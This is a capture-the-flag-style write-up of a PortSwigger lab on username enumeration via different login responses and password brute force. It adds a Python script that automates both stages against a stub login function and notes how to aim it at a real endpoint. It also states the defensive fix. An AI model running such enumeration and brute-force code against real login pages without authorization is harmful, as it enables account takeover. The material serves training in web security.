| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Authentication (Username Enumeration, Brute Force) |
| Difficulty | Apprentice |
| Objective | Enumerate a valid username, brute-force that user's password, then access their account page |
Username Enumeration via Different Responses
Intercepting a login request in Burp Proxy:
Sending it to Intruder, with the username field marked as the payload position and the candidate username wordlist loaded as the payload set:
Running a sniper attack against the username field:
Sorting the results by response length, one candidate, ae, stands out: its response reads "Incorrect password", while every other candidate receives the generic invalid-username message.
That confirms ae is a valid username. The application words its "wrong password" and "unknown username" failures differently, and that difference is exactly what leaks the username. With the username fixed as ae, running the same sniper attack against the password field with the candidate password wordlist:
Sorting by status code, the payload batman returns a 302 redirect, where every other attempt returns the usual 200 with the failure message.
Logging in as ae:batman:
Lab solved
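The two Intruder stages above, written out as a script. This is an added example, not part of the original writeup or of the lab: the `fake_login` function, its messages and the short wordlists are constructed stand-ins for the lab's `/login` endpoint and candidate lists, and the helpers `enumerate_username`, `brute_force_password` and `attack` are names chosen here. The enumeration step generalises what was done by eye in Intruder: it groups responses by status and body, treats the majority response as the "unknown user" case and reports a single outlier as the valid account.

```python
"""Two-stage login attack: find a valid username from response differences,
then brute-force that user's password.

Added example. The login stub, its messages, the credentials and the
wordlists are constructed for illustration, not taken from the lab."""
from collections import Counter
from dataclasses import dataclass
from typing import Callable, Iterable, Optional, Sequence, Tuple


@dataclass(frozen=True)
class Response:
    status: int
    body: str


LoginFn = Callable[[str, str], Response]

# Constructed stand-in for the lab's login endpoint (assumed messages and
# credentials). Swap in a function that POSTs to the real /login to use the
# helpers below against a target.
_VALID_USER = "ae"
_VALID_PASS = "batman"


def fake_login(username: str, password: str) -> Response:
    if username != _VALID_USER:
        return Response(200, "Invalid username")
    if password != _VALID_PASS:
        return Response(200, "Incorrect password")
    return Response(302, "")  # redirect to the account page on success


def enumerate_username(login: LoginFn, candidates: Iterable[str],
                       probe_password: str = "probe") -> Optional[str]:
    """Return the one candidate whose failure response differs from the rest.

    Mirrors the sniper attack on the username field: every attempt uses the
    same junk password, so the only variable is whether the username exists.
    The majority response is the "unknown user" message; a single outlier
    is the valid account.
    """
    results = {u: login(u, probe_password) for u in candidates}
    signatures = Counter((r.status, r.body) for r in results.values())
    if len(signatures) < 2:
        return None  # every response identical: nothing is leaked
    common = signatures.most_common(1)[0][0]
    outliers = [u for u, r in results.items() if (r.status, r.body) != common]
    # Several outliers means the difference is not a clean username signal.
    return outliers[0] if len(outliers) == 1 else None


def brute_force_password(login: LoginFn, username: str,
                         candidates: Iterable[str]) -> Optional[str]:
    """Sniper attack on the password field: success is the 302 redirect."""
    for password in candidates:
        if login(username, password).status == 302:
            return password
    return None


def attack(login: LoginFn, usernames: Sequence[str],
           passwords: Sequence[str]) -> Optional[Tuple[str, str]]:
    """Chain both stages; None if either stage finds nothing."""
    user = enumerate_username(login, usernames)
    if user is None:
        return None
    password = brute_force_password(login, user, passwords)
    return None if password is None else (user, password)


if __name__ == "__main__":
    # Constructed mini wordlists standing in for the lab's candidate lists.
    USERS = ["admin", "root", "ae", "guest", "test"]
    PASSWORDS = ["123456", "password", "qwerty", "batman", "letmein"]
    print(attack(fake_login, USERS, PASSWORDS))
```

Against a real target the signature should be reduced to the part of the body that carries the error message before comparing, because per-response values such as CSRF tokens or session identifiers would otherwise make every response an outlier. The defensive fix the lab illustrates is the inverse of this comparison: return byte-identical responses for an unknown username and a wrong password, so there is no majority and no outlier to find.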